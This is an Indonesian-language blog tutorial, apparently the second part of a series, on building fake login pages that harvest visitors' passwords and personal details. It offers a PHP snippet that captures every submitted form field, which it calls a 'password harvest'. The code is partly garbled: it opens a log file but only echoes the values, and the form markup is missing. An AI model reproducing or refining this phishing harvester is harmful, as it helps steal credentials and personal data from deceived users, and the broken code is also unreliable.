jump to navigation

Making Fake Login Part. 2 October 18, 2011

Posted by ariefsyamsudien in Hacking.
trackback

HOLYCBLOG – Setelah Fake Login Bagian pertama di Link (maaf nih bang admin… bukannya promosi. hehe). di part pertama saya menggunakan fetching variable sebagai landasan menulis pada file hasil panen password. namun pada tutorial kali ini saya ingin menggunakan metode “$_POST as $ variabel => $nilai”.

salah satu kelebiah metode tersebut adalah dapat fetching seluruh variabel yang terletak di dalam tag . tak peduli variabel serta nilai yang digunakan seberapa banyak, dengan statement foreach pada PHP, maka semua variabel dan nilai dari variabel tersebut akan tertulis.

seandainya saya memiliki form registrasi sebagai berikut (maaf nih acak acakan. :D)

Username :

Password :

Address :

Hobby :

nama orang tua :

dan Source Code dari form di atas :

Username :

Password :

Address :

Hobby :

nama orang tua :

Tak mungkin seorang yang membuat Fake login menuliskan semua nama form di atas (jumlahnya 5 form, males nggak?). maka dari itu kita menggunakan metode foreach. gampang saja. here is da coda. cekidot !!!

<?php
 $ident = fopen(“trapped.html”, “a”);
 foreach($_POST as $variabel => $nilai)
{
echo “$variabel = $nilai
“;
}
fclose($ident);
?>

nah… semua isi yang terdapat pada form html akan tertampilkan di layar


akan tertampil di bawahnya.

haha… mudah kan? sulit? mudah kok… sekian dulu yah tut hari ini… udah pulang nih… cucian belum kelar…

Comments»

No comments yet — be the first.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: